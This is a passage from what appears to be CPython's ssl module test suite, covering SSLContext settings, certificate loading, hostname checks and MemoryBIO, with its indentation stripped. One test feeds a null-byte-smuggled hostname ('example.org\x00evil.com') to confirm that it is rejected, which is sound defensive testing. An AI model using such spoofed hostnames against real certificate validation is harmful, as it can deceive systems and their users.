def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
